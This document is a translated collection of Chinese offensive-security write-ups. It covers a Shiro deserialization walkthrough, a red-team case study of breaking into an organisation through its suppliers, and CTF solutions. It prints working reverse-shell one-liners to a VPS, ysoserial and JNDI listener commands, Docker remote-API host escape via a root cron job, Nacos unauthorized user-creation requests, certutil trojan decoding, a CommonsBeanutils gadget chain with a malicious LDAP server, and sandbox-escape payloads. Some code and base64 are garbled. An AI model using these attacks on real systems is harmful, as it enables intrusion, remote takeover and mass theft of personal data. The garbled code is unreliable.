java -jar shiro_tool.jar http://10.11.10.108:8081/login.jsp
Select 0 and enter the dnslog address. The dnslog test gets an echo. A note here: some sites intercept http://dnslog.cn/, and you can switch between multiple dnslog platforms to test. DNSlog has echoes. Next, get the shell. Due to fixed thinking, since I had encountered Linux before I assumed this was Linux too, but the exploit did not succeed. At first I thought a firewall was intercepting; later I probed the directory structure and found it was Windows, so the payload had to be changed here.
3. Use ysoserial to open a port on the public-network VPS and serve the reverse shell command:
java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPListener 1999 CommonsCollections5 'bash command after encoding'
The encoded content is in step 4. Pitfall 1: if the shell does not come back with CommonsCollections1-5, try another chain.
4. Bash reverse shell command, encoded with https://x.hacking8.com/java-runtime.html (encoding link). One of the following three execution commands is chosen as appropriate. Pitfall 2: the bash command executed here depends on the other party's operating system. If it is Linux, try the following three; if it is Windows, look up the Windows reverse shell command separately.
bash -i >& /dev/tcp/VPSIP/7777 0>&1
/bin/bash -i > /dev/tcp/VPSIP/7777 0<&1 2>&1
0<&196;exec 196<>/dev/tcp/VPSIP/7777; sh <&196 >&196 2>&196

Here is the second type, where ip is the IP of the VPS that receives the shell, and port is the port on which nc is listening:
/bin/bash -i > /dev/tcp/192.168.14.222/8888 0<&1 2>&1

Windows:
java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 'ldap://VPS address:1389/Basic/Command/Base64/d2hvYW1p'
d2hvYW1p is the base64 of the command; here the executed command is whoami.
java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS address

5. nc listens.
6. Enter the port opened on the VPS for the shell and the java ysoserial JRMPListener port (select 1 here, use JRMPClient to send the shell back).
7. Execution succeeds, reverse shell received.
-
Title: A case of a breakthrough in the external network
1. Supply Chain After years of offensive and defensive confrontation, a large number of target units have gradually realized the importance of safety protection. Therefore, they have taken steps to constrain asset exposure as much as possible and double down on the deployment of various security devices. However, safety protection focuses on comprehensiveness and has a clear short-term effect. Once a short-term situation occurs, the entire protection system may collapse instantly. The supply chain of the target unit is often a concentrated reflection of these weaknesses. These supply chains are not only exposed, but also make monitoring and management of them more difficult due to complex relationships. Therefore, attack teams usually choose to start from the supply chain and bypass the target unit's powerful defense system in a roundabout way and gain control over the target unit. Search for 'System Name' Target Unit on Search Engine Find relevant supplier information, and obtain the data and permissions of the target unit by attacking the supplier. 1.1, heapdump leak By penetrating supplier assets, it was found that a heapdump file leak was found in the admin directory of a certain asset. I won't go into details about the use of heapdump here. Many articles have conducted in-depth research on its principles and utilization. RCE can be performed directly under specific circumstances. A large amount of sensitive information is leaked here, and password information is added to the password book. Log in to MinIO and find a large amount of sensitive information about the target unit, and there are also sensitive information about other units. Log in to Nacos, add a large number of configuration files, and add password information to the password book![] Log in to OSS and discover a large amount of sensitive information about the target unit 1.2. The WeChat applet interface is not authorized 1.2.1. 
Unpacking WeChat applet If you want to unpack the WeChat applet, the first thing you need to do is to get the wxapkg file of the target applet. The wxapkg file is the installation package file format of WeChat applets, which is used to package the applet's code, resources and other necessary files into a separate file. However, the js code and resource files in the wxapkg file in the Windows environment are generally encrypted, and a specially designed decryption tool is required to first decrypt, then unpack and obtain the file contents. Unpacking can be performed directly under iOS and Android platforms. 1.2.1.1. Get wxapkg file When obtaining wxapkg file, it is best to delete the files in the folder first, and then reopen the applet to prevent other files from interfering with it. The iOS wxapkg file storage path is: /var/mobile/Containers/Data/Application/{System UUID}/Library/WechatPrivate/{user hash value}/WeApp/LocalCache/release/{AppID of applet} The Android wxapkg file storage path is: /data/data/com.tencent.mm/MicroMsg/{user hash value}/appbrand/pkg/ The Windows wxapkg file storage path is: C:\Users\{System Username}\Documents\WeChat Files\Applet\{AppID of applet}\ 1.2.1.2. Decryption operation The following two github projects can be decrypted https://github.com/superdashu/pc_wxapkg_decrypt_python https://github.com/BlackTrace/pc_wxapkg_decrypt Decryption principle Successfully decrypted 1.2.1.2. Unpacking operation Tool download link provided by Guoguang boss https://sqlsec.lanzoub.com/i1NEP0mx694f node wuWxapkg.js 1.wxapkg Unpack the applet, get the front-end JS code, and extract it from it to obtain the interface Direct access to the target interface, although the front-end page shows initialization failure However, data has been obtained in the traffic packet, and nearly 10 million sensitive information of target units have been found. 1.3. 
Web program overreaches Through the above-collected password, a password is knocked out to create an account, but this account has the minimum permission and no operation permissions. Click to search for the organizational structure, and there is no return information at this time Catch the package and remove parentId and orgLevel, and then send the package, you can see the organizational structure of all employees without permission. Click to modify the password, and then add the roleId obtained above to obtain all permissions Get a lot of data 1.4. Official account js leaked password, password can hit the target unit's official account 2. Cloud native security Containerized deployment and microservice architecture provide better flexibility, scalability, maintainability and performance for application development and deployment. It is used by more and more manufacturers. New applications will introduce new attack surfaces, such as container escape, inter-service attacks, API abuse, etc. Attackers can exploit these new entry points to attack applications and data. And managing the authentication and authorization of users and services in a cloud-native environment becomes more complex. Many application developers often overlook or place a secondary position when pursuing the convenience and efficiency of containerized and cloud-native architectures. This directly leads to the fragility of the cloud native environment and is vulnerable to various security threats and attacks. 2.1. Harbor mirror warehouse Harbor is an open source container image repository manager designed to help organizations store, manage and distribute Docker container images, but Harbor has a controversial "vulnerability": any user can directly obtain public images. You can directly pull and download the image file, and you can use scripts to download it in batches. 2.2. 
2.2. Suspected backdoor

Obtain the jar package from the image file, obtain sensitive information such as configuration files, decompile the jar's class files and perform a code audit. The audit turned up a backdoor-like vulnerability: this interface only needs a user name to log into the system background. Administrator permissions are then combined with file upload to obtain server permissions, and the configuration files are used to connect to the database, etc.

2.3. Docker is not authorized

2.3.1. Registry API unauthorized access

In the Docker Registry API, authentication and authorization are usually based on an access token or a username and password. If access control is not configured correctly, an unauthorized access vulnerability results, and an attacker can directly download every image in the registry repository.

Visit the /v2/_catalog interface to view all repository contents.

https://github.com/Soufaker/docker_v2_catalog

Use the above tool to download the images directly.

2.3.2. Docker Remote API unauthorized access

In order to manage container clusters, Docker allows the Daemon, as a background daemon process, to execute Docker commands sent through the management interface. When the Docker Daemon is started with the parameter -H 0.0.0.0:2375, port 2375 is opened to receive commands from remote Docker clients. In this case port 2375 is exposed as an unencrypted port with no form of authentication. An attacker can connect to the Docker Daemon directly with the docker command, operate on containers directly, and achieve container escape by mounting the host's root directory.

# View containers
docker -H tcp://target:2375 ps -a

# Mount the root directory of the host to the /mnt directory in the container
docker -H tcp://target:2375 run -it -v /:/mnt nginx:latest /bin/bash

# Rebound shell
echo 'bounce shell command' >> /mnt/var/spool/cron/crontabs/root
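As an added example (written in Python for this page, not code from the original post), here is a check for the daemon-side misconfiguration behind this exposure: it reads a daemon.json document and flags every tcp:// listener that is not protected by tlsverify together with a CA certificate, which is the only way remote callers get authenticated by client certificate. The two configurations below are constructed samples; the keys used (hosts, tlsverify, tlscacert, tlscert, tlskey) are the documented Docker daemon options.

```python
"""Audit a Docker daemon configuration for an unauthenticated TCP listener.

Added example (not from the original post): checks the "hosts" entries of a
daemon.json document for tcp:// listeners that are not protected by TLS
client-certificate verification, i.e. the 2375 exposure described above.
The sample configurations are constructed for this example.
"""
import json
from urllib.parse import urlsplit

DEFAULT_PLAIN_PORT = 2375  # the unencrypted remote API port named in the text


def audit_daemon_config(config_text: str) -> list:
    """Return a list of findings (strings) for one daemon.json document.

    A finding is raised for every tcp:// listener unless both "tlsverify" is
    true and a CA certificate path ("tlscacert") is configured; only then does
    the daemon require a client certificate from remote callers.
    """
    cfg = json.loads(config_text)
    tls_ok = bool(cfg.get("tlsverify")) and bool(cfg.get("tlscacert"))
    findings = []
    for host in cfg.get("hosts", []):
        parts = urlsplit(host)
        if parts.scheme != "tcp":
            continue  # unix:// and fd:// listeners are local-only
        if tls_ok:
            continue
        bind = parts.hostname or ""
        port = parts.port or DEFAULT_PLAIN_PORT
        exposure = "all interfaces" if bind in ("", "0.0.0.0", "::") else bind
        findings.append(
            f"unauthenticated tcp listener {host}: bound to {exposure}, port {port}"
        )
    return findings


# Constructed sample: the weak setting described in the text.
WEAK_CONFIG = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed sample: the corrected setting, requiring TLS client certificates.
HARDENED_CONFIG = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_daemon_config(text) or "no findings")
```

Note that setting "tlsverify" without "tlscacert" is still reported, because without a CA the daemon has nothing to verify client certificates against.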
2.4. Nacos

Nacos is an open source dynamic service discovery, configuration management and service management platform. It provides a registry center, a configuration center and service management to help developers implement service registration, configuration management and service discovery in a microservice architecture. As an open source tool, many vulnerabilities have been disclosed against it.

Unauthorized access (view users directly):
/nacos/v1/auth/users?pageNo=1&pageSize=1

Add any user:
POST /nacos/v1/auth/users
username=<name>&password=<password>

Modify any user's password:
curl -X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken\=' -H 'User-Agent:Nacos-Server' -d 'username\=test1&newPassword\=test2'

Weak password: nacos/nacos

By spraying passwords into the background, a large number of configuration files were found, but the sensitive information in them was encrypted.

2.4.1. Jasypt encryption

Spring configuration files contain sensitive information such as database passwords, so sometimes we want to encrypt it. Jasypt is a relatively convenient tool: a Java library that simplifies encryption and decryption of sensitive data such as passwords and API keys. The encrypted content is wrapped in ENC(...), and the encryption password is specified by jasypt.encryptor.password.

spring:
  datasource:
    username: your-username
    password: ENC(encrypted-password)

Because the value must be decrypted at runtime, the password has to be placed in the configuration file or in the code:

# application.yml
jasypt:
  encryptor:
    password: <password>
    algorithm: <encryption method>

Decrypt data: use the decrypt method of the decryptor to decrypt the encrypted data.
import org.jasypt.util.text.BasicTextEncryptor;

public class DecryptionExample {
    public static void main(String[] args) {
        String encryptionKey = "yourEncryptionKey"; // encryption key (jasypt.encryptor.password)
        BasicTextEncryptor textEncryptor = new BasicTextEncryptor();
        textEncryptor.setPassword(encryptionKey);
        String encryptedText = "encryptedText"; // the ciphertext inside ENC(...)
        String decryptedText = textEncryptor.decrypt(encryptedText);
        System.out.println("Decrypted Text: " + decryptedText);
    }
}

However, the security of this client-side encryption depends entirely on protecting the client code and configuration: once the password leaks, the encryption is void. If you find a Jasypt-encrypted password in a Nacos configuration file, you can decrypt it directly.

Successfully connected to OSS
Successfully connected to the database
Mini program token, take over the mini program

Dameng Database is a Chinese domestic relational database. You can use the following tool to connect to it:
https://github.com/864381832/x-RdbmsSyncTool/releases/tag/v0.0.3

3. Nday

3.1. yongyouNC jsInvoke RCE vulnerability

Exploit method: create a javax.naming.InitialContext object through the Java reflection mechanism and connect to the specified IP address and port using the LDAP protocol. Then call the 'saveXStreamConfig' method of the 'nc.itf.iufo.IBaseSPService' service, which accepts an object and a string as parameters, achieving command execution.

The command executed successfully, but the target system has antivirus, so the file could not be uploaded directly.

3.1.1. certutil

certutil is a command line tool in the Windows operating system, mainly used for certificate and encryption-related operations. Its decode operation can be used to get around the restriction.

echo <base64 encoding> > myfile.jsp

Decode using certutil:
certutil -decode <Trojan relative path> <decoded Trojan relative path>

Ice Scorpion (Behinder) is online and CS is launched.
3.2. Opening it showed that the Shiro hole had been fixed, but a front-end information leak vulnerability was found. With the username obtained, a weak password got into the background with normal permissions. Once again, the password was guessed from an announcement post and the background was successfully logged into. System management permissions were added, and the user was given the highest permissions. After logging in with the added user, a scheduled-task function was discovered, and the scheduled task was used directly to execute commands.

3.3. Shiro

When the target path is accessed, it first redirects to the unified authentication login, so most people overlook that the path has a Shiro deserialization vulnerability. With a "just try it" mentality, I scanned for Shiro and obtained permissions directly.

Reprinted from the original link: https://forum.butian.net/share/2442
-
Title: 2023 Anxun Cup 6th Cyber Security Challenge WP
web ai_java First get the account number through the attachment account letter You can get the prompts js and c through base64 or jsfuck. If you audit js, you can see the c function and run it. Get the github project address Find the submission history We found the source code The audit source code found that spring–boot may exist without authorization bypass Fastjson parsing exists in the /post_message/interface under admin's page Check the specific version and find that it is impossible to directly attack the ladp, check the dependencies Discovery introduced shiro. Use SerializedData + LDAP attacks. and dependency-free CB to bounce shells public class CB { public static void setFieldValue(Object obj, String fieldName, Object t value) throws Exception { Field field=obj.getClass().getDeclaredField(fieldName); field.setAccessible(true); field.set(obj, value); } public static Comparator getValue(Object instance) throws NoSuchFiel dException, IllegalAccessException { Class? clazz=instance.getClass(); //Get the Field object of private variables Field privateField=clazz.getDeclaredField('INSTANCE'); //Set access permissions for private variables privateField.setAccessible(true); //Get the value of a private variable Object value=privateField.get(instance); return (Comparator) value; } public static byte[] getPayload() throws Exception { ClassPool pool=ClassPool.getDefault(); CtClass clazz=pool.get(evil.class.getName()); byte[] code=clazz.toBytecode(); TemplatesImpl obj=new TemplatesImpl(); setFieldValue(obj, '_bytecodes', new byte[][]{code}); setFieldValue(obj, '_name', 'tvt'); setFieldValue(obj, '_tfactory', new TransformerFactoryImpl()); final BeanComparator comparator=new BeanComparator(null, getVa lue(new Headers())); Queue queue=new PriorityQueue(2, comparator); queue.add('1'); queue.add('1'); setFieldValue(comparator, 'property', 'outputProperties'); setFieldValue(queue, 'queue', new Object[]{obj, obj}); ByteArrayOutputStream barr=new ByteArrayOutputStream(); 
ObjectOutputStream oos=new ObjectOutputStream(barr); oos.writeObject(queue); oos.close(); byte[] byteArray=barr.toByteArray(); String base64EncodedData=Base64.getEncoder().encodeToString(by teArray); System.out.println(base64EncodedData); return byteArray; } } public class evil extends AbstractTranslet { public void transform(DOM var1, SerializationHandler[] var2) throws TransletException { } public void transform(DOM var1, DTMAxisIterator var2, SerializationH andler var3) throws TransletException { } public static void main(String[] args) throws Exception { Runtime.getRuntime().exec('bash -c {echo,5L2g5oOz6LWj5LuA5LmI44CC5YaZ6Ieq5bex55qE5ZG95Luk}|{base64,-d}|{bash,-i}'); } public evil() throws Exception { Runtime.getRuntime().exec('bash -c {echo,5L2g5oOz6LWj5LuA5LmI44CC5YaZ6Ieq5bex55qE5ZG95Luk}|{base64,-d}|{bash,-i}'); } } public class LDAPSerialServer { private static final String LDAP_BASE='dc=example,dc=com'; public static void main ( String[] tmp_args ) { String[] args=new String[]{'http://127.0.0.1:8000/#EvilClass'}; int port=7777; try { InMemoryDirectoryServerConfig config=new InMemoryDirectory ServerConfig(LDAP_BASE); config.setListenerConfigs(new InMemoryListenerConfig( 'listen', //$NON-NLS-1$ InetAddress.getByName('0.0.0.0'), //$NON-NLS-1$ port, ServerSocketFactory.getDefault(), SocketFactory.getDefault(), (SSLSocketFactory) SSLSocketFactory.getDefault())); config.addInMemoryOperationInterceptor(new OperationIntercep tor(new URL(args[ 0 ]))); InMemoryDirectoryServer ds=new InMemoryDirectoryServer(con fig); System.out.println('Listening on 0.0.0.0:' + port); //$NON-N LS-1$ ds.startListening(); } catch ( Exception e ) { e.printStackTrace(); } } private static class OperationInterceptor extends InMemoryOperationI nterceptor { private URL codebase; public OperationInterceptor ( URL cb ) { this.codebase=cb; } @Override public void processSearchResult ( InMemoryInterceptedSearchResul t result ) { String base=result.getRequest().getBaseDN(); Entry e=new 
Entry(base); try { sendResult(result, base, e); } catch ( Exception e1 ) { e1.printStackTrace(); } } protected void sendResult ( InMemoryInterceptedSearchResult resu lt, String base, Entry e ) throws Exception { System.out.println('Send LDAP reference result for ' + base + ' return CB gadgets'); e.addAttribute('javaClassName', 'DeserPayload'); //$NON-NLS- 1$ String base64EncodedData='rO0ABXNyABdqYXZhLnV0aWwuUHJpb3Jp dHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0N vbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbk NvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAAST GphdmEvbGFuZy9TdHJpbmc7eHBzcgA/Y29tLnN1bi54bWwuaW50ZXJuYWwud3MudHJhbnNw b3J0LkhlYWRlcnMkSW5zZW5zaXRpdmVDb21wYXJhdG9yyIEeXDpxA/ECAAB4cHQAEG91dHB 1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybm FsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlc kkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2 YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZ hL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAABdX IAAltCrPMX+AYIVOACAAB4cAAABinK/rq+AAAANA1CgAiACMIACQKACIAJQoAJgAnCgAHA CgHACkHACoBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRl cm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3Nlcml hbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYm xlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABkxldmlsOwEABHZhcjEBAC1MY29tL 3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAR2YXIyAQBCW0xj b20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmmlhbGl6ZXIvU2VyaWFsaXphdGl vbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAKwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbG FuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hb C9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL9hcGFjaGUveG1sL2ludGVybmFsL3Nlc mlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBADVMY29tL3N1bi9vcmcvYXBhY2hl 
L3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEABHZhcjMBAEFMY29tL3N1bi9 vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmmlhbGl6YXRpb25IYW5kbG VyOwEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAEYXJncwEAE1tMamF2YS9sY W5nL1N0cmluZzsHACwBAAY8aW5pdD4BAAMoKVYBAApTb3VyY2VGaWxlAQAJZXZpbC5qYXZh BwAtDAAuAC8BAGFiYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppOWtaWFl2ZEdOd0x6UTN MakV4TXk0eE9Ua3VNVFE0THpnNE9EZ2dNRDRtTVE9PX18e2Jhc2U2NCwtZH18e2Jhc2gsLW l9DAAwADEHADIMADMANAwAHgAfAQAEZXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhb i9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29y Zy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZ hL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKC lMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphd mEvbGFuZy9Qcm9jZXNzOwEAA0NDNgEACmdldFBheWxvYWQBAAQoKVtCACEABgAHAAAAAAE AAEACAAJAAIACgAAAD8AAAAAAAAAAAAAAAAAAAGAAEAAAAALAAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0 ADgAAAAAAAQAPABAAAQAAAAEQASAAIAEwAAAAQAUAAEACAAVAAIACgAAAAEkAAAAAAAAAA AAAbEAAAACAAsAAAAGAAEAAAAAAOAAWAAAAQAAQAAAABAA0ADgAAAAAAAAAQAPABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE QAWAAIAAAABABcAGAADABMAAAAEAFAAJABkAGgACAAoAAABAAAIAQAAAA64AAESArYA A1e4AARXsQAAAAIACwAAAA4AAwAAABEACQASAA0AEwAMAAADAABAAAADgAbABwAAAATAAA ABAABAB0AAQAeAB8AAgAKAAAAQAACAAEAAAAOKrcABbgAARICtgADV7EAAAAACAAsAAAAAAAAAAAA MAAAAUAAQAFQANABYADAAAAAWAAQAAAAA4ADQAOAAAAEwAAAAQAAQAdAAEAIAAAAAIAIXB0A AN0dnRwdwEAeHEAfgANeA=='; e.addAttribute('javaSerializedData', Base64.getDecoder().dec ode(base64EncodedData)); result.sendSearchEntry(e); result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); } } } We use CB to encode base64 and do not call directly. We prevent internal API errors when jar packages. Locally, we use CVE-2022-22978 to bypass identity authentication, use fastjson's cache bypass, and implement jndi injection Initiation. 
signal

First of all, this challenge converts other file formats to YAML and then calls yaml.load(), which loads the content as a JS object. Looking up the js-yaml documentation on GitHub for how objects are parsed (the project page also gives an example), we directly look at what it can parse into.

The js-yaml version is 3.14.1. Compared with the newer versions' commits:
https://github.com/nodeca/js-yaml/commit/ee74ce4b4800282b2f23b776be7dc95dfe34db1c

This is the last version with the dangerous mode as default, which allows arbitrary JS functions to be constructed with the !!js/function tag. Then, where the template is rendered, the toString method of the object is called automatically. So upload a YAML file with the following payload as its content:

'name' : { toString: !!js/function 'function(){ flag=process.mainModule.require('child_process').execSync('cat /fla*').toString(); return flag;}'}

Swagger docs

1. Read the interface documents to figure out the website functions.
2. Register a user:
http://47.108.206.43:40476/api-base/v0/register
{'username':'admin','password':'admin'}
3. Log in:
http://47.108.206.43:40476/api-base/v0/login
{'username':'admin','password':'admin'}
4. Arbitrary file read. Testing found that an arbitrary file read exists in the /api-base/v0/search interface.
Read the process command line:
http://47.108.206.43:40476/api-base/v0/search?file=./././././proc/1/cmdline&type=text
Read the source code location:
http://47.108.206.43:40476/api-base/v0/search?file=./././././app/run.sh&type=text
Read the source code.
5. Code audit. /api-base/v0/search uses render_template_string(), which can cause SSTI and thus RCE, and only the rendered content needs to be controlled. There is prototype-chain-like pollution in the update() function, which can be used to modify the environment.
-
Title: The 7th Strong Net Cup Preliminary Competition in 2023 WP
MISC

easyfuzz

1. By trying different inputs, it was determined that the program checks 9 characters of the input, and as long as the correct characters are supplied the final return value is all 1s (1111111111), which gives the flag. Continuing to guess boldly, it was found that the first two characters can be anything, which yields 110000000, so the last seven characters are the ones to crack.
2. Brute-force character by character to verify the idea; the last character is 'd'.
3. Write a brute-force script. For each 9-character input, print it if the result is not "Here is your code coverage: 110000000". The script is as follows:

from pwn import *
from string import printable

conn = remote('101.200.122.251', 12199)
non_matching_strings = []
for i in range(9):
    for char in printable:
        # vary one position at a time, padding the rest with 'a'
        payload = 'a' * i + char + 'a' * (8 - i)
        print(conn.recvuntil(b'Enter a string (should be less than 10 bytes):'))
        conn.sendline(payload.encode())
        response = conn.recvline().decode().strip()
        if response != 'Here is your code coverage: 110000000':
            non_matching_strings.append(payload)
for string in non_matching_strings:
    print(string)

FLAG: qwb{YouKnowHowToFuzz!}

Sign in

flag{welcome_to_qwb_2023}

Pyjail ! It's myFILTER !!!

Python sandbox escape: after the filter is disabled, open() directly reads the environment to get the flag.

{13212}'+(print(open('/proc/1/environ').read()))+'

Or use the payload:

{print(open('/proc/1/environ').read())}

flag{61e81b4f-566c-49f5-84dd-d79319fddc82}

Pyjail ! It's myRevenge !!!
Python sandbox escape. Write a file containing import os;os.system("nl fl*>hzy") and then read the output to get the flag. All filtered characters are bypassed with octal escapes, and the file is written in segments:

{13212}'+(open('wsy', 'a').write('\151\155\160\157\162'))+'{13212}'+(open('wsy', 'a').write('t \157'))+'{13212}'+(open('wsy', 'a').write('\163;\157'))+'{13212}'+(open('wsy', 'a').write('\163.'))+'{13212}'+(open('wsy', 'a').write('\163y'))+'{13212}'+(open('wsy', 'a').write('st'))+'{13212}'+(open('wsy', 'a').write('em("nl \146*>hzy")'))+'{13212}'+open('\143\157de.py','w').write(open('wsy').read())+'{13212}'+(print(open('hzy').read()))+'

Or execute the following PoC lines in turn:

{globals().update(dict(my_filter=lambda x:1))}''{in''put()}'#
{globals().update(dict(len=lambda x:0))}''{in''put()}'#
{print(''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['__builtins__']['__import__']('os').listdir())}
['flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104', 'server_8F6C72124774022B.py']
{globals().update(dict(my_filter=lambda x:1))}''{in''put()}'#
{globals().update(dict(len=lambda x:0))}''{in''put()}'#
{print(open('flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104').read())}

flag{8f0a4ac2-52d3-4adb-a1a3-47e05997817d}

Wabby Wabbo Radio

F12 gives the link to the wav: /static/audios/xh4.wav. Refreshing shows that the file played is selected at random. Fuzzing found a total of xh1-xh5, hint1-hint2 and flag.wav. The left channel of each wav is obviously Morse code. Separate the channels, increase the amplitude, and decode it with the online website https://morsecode.world/international/decoder/audio-decoder-adaptive.html to get:

Do you want a flag? Let's listen a little longer.Genshin Impact starts.The weather is really nice today. It's a great day to listen to the Wabby Wabbo radio.If you don't know how to do it, you can go ahead and do something else first.may be flag is png picturedo you know QAM?
Nothing else is useful; the only hint is the QAM carrier amplitude: https://info.support.huawei.com/info-finder/encyclopedia/zh/QAM.html (QAM constellation diagram). After a brief look, I found that 0/1 can be distinguished by amplitude. Printing the amplitudes shows that they are all concentrated at ±1 and ±3. Comparing with the 16-QAM constellation diagram, the amplitudes map one-to-one onto symbols, but the specific correspondence is unknown, so we blindly guess from small to large. The simple script is as follows:

import scipy.io.wavfile as wav
import numpy as np
import sys

sample_rate, data = wav.read('flag.wav')
for i in data:
    print(i)

flag = ''

def repla(n):
    # guessed mapping from amplitude level to bit pair, small to large
    if n == -3:
        return '00'
    elif n == -1:
        return '01'
    elif n == 1:
        return '10'
    elif n == 3:
        return '11'

for x, y in data:
    n1 = round(float(x))
    n2 = round(float(y))
    flag += repla(n1)
    flag += repla(n2)
print(flag)

Spy Shadows 3.0

Hint given: a paper airplane is also an airplane, and can also fly abroad to the other side of the ocean. From the description, it is easy to associate the special tunnel with a VPN. A little searching leads to Shadowsocks; reference article: https://phuker.github.io/posts/Shadowsks-active-probing.html

The complete decryption script was given in the article, but the key is unknown, so I just brute-forced it, using "HTTP" as the marker of a successful request.
#!/usr/bin/env python3
# encoding: utf-8
import os
import sys
import logging
import hashlib
from Crypto.Cipher import AES

logging.basicConfig(level=logging.INFO)

def EVP_BytesToKey(password, key_len, iv_len):
    # OpenSSL-style derivation: chain MD5(previous digest + password) until enough bytes
    m = []
    i = 0
    while len(b''.join(m)) < (key_len + iv_len):
        md5 = hashlib.md5()
        data = password
        if i > 0:
            data = m[i - 1] + password
        md5.update(data)
        m.append(md5.digest())
        i += 1
    ms = b''.join(m)
    key = ms[:key_len]
    iv = ms[key_len:key_len + iv_len]
    return key, iv

def decrypt(cipher, password):
    key_len = int(256 / 8)
    iv_len = 16
    mode = AES.MODE_CFB
    key, _ = EVP_BytesToKey(password, key_len, iv_len)
    cipher = bytes.fromhex(cipher)
    iv = cipher[:iv_len]          # aes-256-cfb: the IV is the first 16 bytes of the stream
    real_cipher = cipher[iv_len:]
    obj = AES.new(key, mode, iv, segment_size=128)
    plain = obj.decrypt(real_cipher)
    return plain

def main():
    # test http request
    cipher = 'e0a77dfafb6948728ef45033116b34fc855e7ac8570caed829ca9b4c32c2f6f79184e333445c6027e18a6b53253dca03c6c464b8289cb7a16aa1766e6a0325ee842f9a766b81039fe50c5da12dfaa89eacce17b11ba9748899b49b071851040245fa5ea1312180def3d7c0f5af6973433544a8a342e8fcd2b1759086ead124e39a8b3e2f6dc5d56ad7e8548569eae98ec363f87930d4af80e984d0103036a91be4ad76f0cfb00206'
    with open('rockyou.txt', 'rb') as f:
        lines = f.readlines()
    for password in lines:
        plain = decrypt(cipher, password.strip())
        if b'HTTP' in plain:
            print(password, plain)

if __name__ == '__main__':
    main()

#b'superman\n' b'\x03\x0f192.168.159.131\x00PGET /Why-do-you-want-to-know-what-this-is HTTP/1.1\r\nHost: 192.168.159.131\r\nUser-Agent: curl/8.4.0\r\nAccept: */*\r\nConnection: close\r\n\r\n'

Get the file name Why-do-you-want-to-know-what-this-is; its md5 is the flag:
flag{dc7e57298e65949102c17596f1934a97}

Spy Shadows 2.0

From the challenge description, aircraft traffic is easily associated with the ADS-B protocol. Export the TCP stream data:

tshark -r attach.pcapng -Y 'tcp' -T fields -e tcp.segment_data > tcp.txt

Parsing script:

import pyModeS

with open('tcp.txt', 'r') as f:
    lines = f.readlines()
for data in lines:
    if len(data) == 47:
        # strip the 18-hex-char framing prefix, leaving the 28-char ADS-B message
        print(pyModeS.decoder.tell(data.strip()[18:]))
Filter for "Airborne velocity": the fastest airplane, 79a05e, does 371 knots, and the md5 of the ICAO address is the flag.

Or export the packets to JSON format, extract the fields with a script and take the MD5:

import json
import pyModeS as pms
import hashlib

